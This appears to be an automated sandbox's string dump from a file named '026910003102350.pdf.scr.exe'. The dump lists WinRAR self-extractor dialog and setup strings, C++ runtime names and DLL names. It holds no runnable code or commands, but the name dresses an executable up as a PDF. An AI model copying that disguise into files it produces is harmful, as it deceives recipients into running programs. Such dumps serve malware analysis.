      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractprogress
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_maxpathlimit
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unkencmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongpassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongfilepassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_copyerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnks
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnkh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errlnktarget
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_needadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_pause
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_continue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secwarning
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secdeldll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_destedittitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_changedir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_progressbartitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrfileexists
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owraskreplace
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrquestion
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owryes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrrename
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrno
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnoall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renamefrom
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renameto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idc_passwordenter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolfind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: user32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gdi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comdlg32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: advapi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: acquiresrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasesrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <5ikq
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __cdecl
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __pascal
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __stdcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __thiscall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __fastcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __vectorcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __clrcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __eabi
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __ptr64
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __restrict
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __unaligned
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: restrict(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vftable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbtable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vcall'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `typeof'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static guard'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `string'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbase destructor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector deleting destructor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `default constructor closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `scalar deleting destructor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector destructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `virtual displacement map'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector destructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `copy constructor closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `udt returning'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `rtti
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable constructor closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: new[]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete[]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `omni callsig'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete[] closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector destructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic initializer for '
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic atexit destructor for '
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static thread guard'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator ""
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator co_await
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator<=>
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: type descriptor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class descriptor at (
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class array'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: class hierarchy descriptor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: complete object locator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `anonymous namespace'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*++---+&->*/%<<=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-synch-l1-2-0api-ms-
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsalloc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsfree
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsgetvalue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flssetvalue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: initializecriticalsectionex
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ( 8px
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 50p( 8px
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 700wp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xpxxxx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````xpxxxx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)(null)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: corexitprocess
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mscoree.dllcorexitprocess`
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: e+000
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sunday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: monday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: tuesday
